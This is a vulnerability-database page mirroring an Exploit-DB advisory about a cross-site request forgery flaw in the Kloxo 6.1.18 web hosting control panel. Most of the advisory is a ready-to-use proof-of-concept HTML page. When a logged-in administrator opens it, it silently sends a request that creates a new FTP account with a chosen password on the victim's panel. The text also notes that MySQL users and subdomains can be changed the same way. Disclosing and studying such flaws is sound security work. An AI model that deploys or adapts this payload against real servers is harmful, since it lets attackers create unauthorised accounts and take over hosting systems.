Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Kloxo 6.1.18 Stable - Cross-Site Request Forgery

🗓️ 02 Apr 2014 00:00:00Reported by Necmettin COSKUNType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 24 Views

Kloxo 6.1.18 Stable CSRF Vulnerability, Allows Remote Attackers to Manipulate Form

Code
# Exploit Title		:Kloxo 6.1.18 Stable CSRF Vulnerability
# Vendor Homepage	:http://lxcenter.org/software/kloxo
# Version			:6.1.18
# Exploit Author	:Necmettin COSKUN =>@babayarisi
# Blog				:http://www.ncoskun.com http://www.grisapka.org
# Discovery date	:03/12/2014
# CVE				:N/A
 
Kloxo (formerly known as Lxadmin) is a free, opensource web hosting control panel for the Red Hat and CentOS Linux distributions.
================
CSRF Vulnerability
 
Vulnerability
================
Kloxo has lots of POST and GET based form applications some inputs escaped from specialchars but inputs dont have any csrf protection or secret key 
So an remote attacker can manipulate this forms to add/delete mysql user,create/delete subdomains or add/delete ftp accounts.

Poc Exploit
================

 <html>
 <head><title>Kloxo demo</title></head>
 <script type="text/javascript">
 function yurudi(){
		///////////////////////////////////////////////////////////
		//Kloxo 6.1.18 Stable CSRF Vulnerability		 //	
		//Author:Necmettin COSKUN => twitter.com/@babayarisi	 //
		//Blog: http://www.ncoskun.com | http://www.grisapka.org //
		///////////////////////////////////////////////////////////
		//Remote host
		var host="victim.com";	
		//New Ftp Username
		var username="demouser";
		//New Ftp Password
		var pass="12345678";
		//This creates new folder under admin dir. /admin/yourfolder
		var dir="demodirectory";
		//If necessary only modify http to https ;)
		var urlson="http://"+host+":7778//display.php?frm_o_cname=ftpuser&frm_dttype&frm_ftpuser_c_nname="+username+"&frm_ftpuser_c_complete_name_f=--direct--&frm_ftpuser_c_password="+pass+"&frm_confirm_password="+pass+"&frm_ftpuser_c_directory="+dir+"&frm_ftpuser_c_ftp_disk_usage&frm_action=add";

		document.getElementById('demoexploit').src=urlson;
}
 </script>
 <body onload="yurudi();">
 <img id="demoexploit" src=""></img>
 </body>
 </html>
 
 
Discovered by:
================
Necmettin COSKUN  |GrisapkaGuvenlikGrubu|4ewa2getha!

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Apr 2014 00:00Current
7.4High risk
Vulners AI Score7.4
kloxocsrfvulnerabilityremote attackerforms manipulationred hatcentoslinux distributionscontrol panel
24